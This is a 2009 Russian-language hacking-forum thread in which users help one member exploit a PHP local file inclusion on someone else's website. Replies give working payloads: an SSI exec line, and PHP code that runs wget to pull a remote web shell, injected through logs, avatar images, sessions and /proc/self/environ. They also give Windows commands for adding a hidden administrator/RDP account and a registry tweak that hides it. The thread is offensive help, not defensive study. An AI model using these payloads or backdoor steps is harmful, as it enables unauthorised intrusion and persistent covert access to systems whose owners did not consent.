ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.08.2009, 04:19
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
Попробуй залить .shtml-файл вот с таким <!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
|
|
|
16.08.2009, 10:46
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Смотрите есть сайт с PHP-inj
http://site.ru/module/index.php?p=index
Ну понятно что в $_GET[p] и переносится путь до файла.
Если указываю не верный путь то пишет что фаил не найден, значит стоит проверка на то есть ли фаил...
Открыл config.php начего не написалось так как нет вывода...
Также есть форум на vBulletin ну попробовал открыть индекс
../forum/index мне написалось что пути до конфгов не найдены и уже видел еррор, тоесть ошибки не отключены
Из ошибки видно что апач стоит на винде...
попытки загрузить внешку типо
PHP код:
http://site.ru/module/index.php?p=http://forum.antichat.ru/newreply
Закнончились неудачей типо фаил не найден, FTP метод тож не прошёл...
Подскажите что можно сделать?
Может так как система на винде, можно чтолить интересного накопать? Хотя не могу оборвать расширение которое присваевается (.php)
Последний раз редактировалось Byrger; 16.08.2009 в 14:36..
|
|
|
|
16.08.2009, 10:55
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
Может скрипт прикручивает расширение файлу? Попробуй поэксперементировать с нулл-байтом.
|
|
|
|
16.08.2009, 13:34
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
обрезать расширение нул-байтом и инклудить логи/картинки/сессии/environ/etc
попробовать php://input
|
|
|
|
16.08.2009, 20:53
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Spyder, я от нечего делать рассписал эти методы залития шелла через LFI.
Скорее всего директива allow_url_include = off. Т.е. проинклюдить удаленно не удастся.
Вариант #0. Можно инклюдить логи, но надо знать путь к ним. Есть специальная тема со списком путей к httpd.conf. Не нашёл пути - пропускай этот пункт. Там есть директива TransferLog, в которой находится абсолютный путь к логам. Открой
Код:
index.php?<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>
После этого в лог-файл запишется PHP код, тебе останется только проинклюдить лог-файл.
Вариант #1. Создай картинку, впиши в конец файла <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>, только не блокнотом, а любым хекс-редактором. Реганись на форуме, залей себе эту картинку в кач-ве аватары, или фотки, etc. Потом инклюдь эту картинку
Код:
http://site.ru/module/index.php?p=../forum/avatars/avatar28082.gif
И открывай файлик shell.
Вариант #2. Допустим, на сайте есть код, вида
PHP код:
session_start();
$_SESSION['id']=$_GET['value'];
Тогда открывай
Код:
file.php?value=<?php system('wget http://mysite.ru/shell.txt -O shell.php');?>
Дальше в куки сайта смотри PHPSESSID и инклюдь Путь к сохраниению сессий может быть иной...
Вариант #3. Еще есть вариант с /proc/self/environ. Если проинклюдив его, ты получаешь что-то вида
Код:
DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.site.ru/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/var/www SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.site.ru SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.site.ru Port 80
Считай, что шелл у тебя есть. Используй любую HTTP-тулзу, н.п. InetCrack и измени отправляемый заголовк User-Agent на <?php system('wget http://mysite.ru/shell.txt -O shell.php');?>.
ЗЫ: system() может не работать, используй exec();
wget может не работать, используй lynx, fetch, curl...
Последний раз редактировалось mailbrush; 16.08.2009 в 20:58..
|
|
|
|
17.08.2009, 01:32
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
DeluxeS загляни сюда http://forum.antichat.ru/thread103576.html
|
|
|
|
17.08.2009, 03:12
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
|
|
|
|
17.08.2009, 06:10
|
|
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312
Репутация:
50
|
|
А для того, чтобы не запалили, надо сделать в реестре такую фичу:
HKLM/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon/SpecialAccounts/Userlist/
Создаёшь там параметр с типом REG_DWORD, именем своего юзера и значением 0.
|
|
|
|
17.08.2009, 08:51
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
DeluxeS, рес куда ты хочешь залить свой шелл случайно не едушка?
|
|
|
|
17.08.2009, 11:22
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Задаюсь я этим вопросом уже не впервый раз =\
Я проинклюдил /proc/self/environ, но инклюдящий файл не PHP, a CGI. PHP команды, разумеется, не пашут, так что же можно сделать?
//Как я понял мне нужен аналог system'a на perl'e, но может я не прав.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид